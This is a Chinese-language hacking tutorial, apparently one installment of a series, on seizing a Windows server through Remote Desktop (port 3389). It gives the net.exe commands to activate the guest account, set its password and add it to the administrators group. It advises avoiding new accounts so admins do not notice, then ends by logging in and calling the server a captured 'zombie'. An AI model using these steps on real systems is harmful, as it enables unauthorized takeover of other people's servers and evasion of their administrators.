通过3389端口入侵经典案例

核心提示： net localgroup localgroupname username /add（添加账号到某个组）以上命令应该清楚了吧，现在让我们来发挥创造性思维，通过3389端口入侵经典案例(3)，1） 在C:WinNTSystem32目录下找到net.exe，并为net.exe创建一个快捷方式

net localgroup localgroupname username /add（添加账号到某个组）

以上命令应该清楚了吧，现在让我们来发挥创造性思维。

1） 在C:WinNTSystem32目录下找到net.exe，并为net.exe创建一个快捷方式（这个不用笔者教了吧-_-），完成之后会在同一目录下多出一个快捷方式的图标来。

2） 用鼠标右键点击该快捷方式的图标，选取“属性”，在“目标”中的c:winntsystem32 et.exe后面空一格，填入user guest /active :yes，点击“确定”（图2）。

图 2

3）上一步的目的在于用net.exe激活被禁止使用的guest账号。当然也可以填入“user 用户名 密码 /add”来创建一个新账号，不过莫明多出一个账户在实战当中容易引起网管的注意，导致入侵失败，此法实不可取。

4）双击运行该快捷方式，不要奇怪你没有看到运行状态，因为实际上guest账户已被激活了。现在需要再修改该快捷方式，填入“user guest 密码”点击“确定”。双击运行该快捷方式，现在guest账号已经有密码了。

5）最后我们要将guest账号加入到管理员组中，使之成为名副其实的系统管理员。再对它进行修改，填入“localgroup administrators guest /add”，然后点击“确定”，双击运行该快捷方式。

注意：

1．因为受到网速的影响，你所看到的图像与操作会有所延迟。

2．由于连接服务器的用户过多，在连接登录服务器的过程中，你有可能会遇到“超过了允许最大连接数”的提示。如果是这样请稍后再试

。

Step4：完全占领

控制服务器“肉鸡”

通过上面的操作，我们已经得到了一个系统管理员账号。接下来要想控制这台服务器就好办多了。打开远程终端管理程序，在登录画面出现后，填入用户名guest和你设的密码，点击“连接”，现在你看到什么了？对！这台服务器就是你的了。